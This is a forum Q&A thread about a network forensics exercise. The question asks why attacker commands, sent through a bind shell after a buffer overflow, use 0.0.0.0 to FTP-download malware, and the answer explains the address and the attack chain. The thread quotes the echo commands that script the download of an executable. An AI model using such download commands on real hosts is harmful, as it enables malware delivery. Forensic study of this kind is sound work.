4

Working through this exercise in network forensics, the attacker used a buffer overflow exploit to send commands to the victim's command prompt. The commands open an FTP session and download some malware. I'm confused about why it works with the ip address 0.0.0.0 The packets show the attacker binds a shell on the victim's host and uses FTP to force it to download an executable.

The commands are:

echo open 0.0.0.0 8884
echo user 1 1
echo get ssms.exe

My question is, how would they get anywhere using the IP address 0.0.0.0 ?? Is the bound shell somehow associated with / "in" the attacker's network while the exploit is going on so that 0.0.0.0 resolves to localhost on the attacker's machine?

Some of the answers used the presence of this IP address to prove that the victim was a honeypot because it accepted any IP address the attacker gave them and downloaded the exe as told. Still, how would 0.0.0.0 get anywhere? Also, wouldn't this be a nice way for an attacker to know they have hacked into a honeypot?

One answer (PDF) gives a good write-up of the exploit but does not specifically address this question. Another answer (PDF) thinks the 0.0.0.0 might be an error, so I am confused.

mcgyver5
  • 6,807
  • 2
  • 24
  • 45

1 Answers1

5

In the Internet Protocol Version 4, the address 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target. To give a special meaning to an otherwise invalid piece of data is an application of in-band signaling.

In the context of servers, 0.0.0.0 means "all IPv4 addresses on the local machine". If a host has two IP addresses, 192.168.1.1 and 10.1.2.1, and a server running on the host listens on 0.0.0.0, it will be reachable at both of those IPs.

In the context of routing, 0.0.0.0 usually means the default route, i.e. the route which leads to "the rest of" the internet instead of somewhere on the local network.

Wikipedia Article on 0.0.0.0

If I were to guess, as I have not done the challenge, but based off of the first link provided the exploit went something like this:

  1. Exploit CVE-2003-0533 - shellcode to bind port TCP 1957 as a shell. (maybe the attacker knew this port wasn't blocked by a firewall?)
  2. Commands executed from the shell to set up a reverse ftp connection to himself (in this case). Exposing this to the host via port 8884. Since the computer could have multiple IPs, 0.0.0.0 is a way to say "whatever interface the reverse connection worked on would accept this connection. A reverse connection may aid in bypassing firewall rules
  3. FTP server is located on the other end of this tunnel, the commands that were executed logged into the ftp and downloaded the malware to the victim's PC for later execution.
Brett Salmiery
  • 96
  • 4
  • I see what I missed. A shell was already open to attacker's machine, so the 0.0.0.0 was used locally to the attacker just as if I had logged into a remote host with ssh and typed ftp 0.0.0.0 etc... – mcgyver5 Aug 26 '15 at 14:43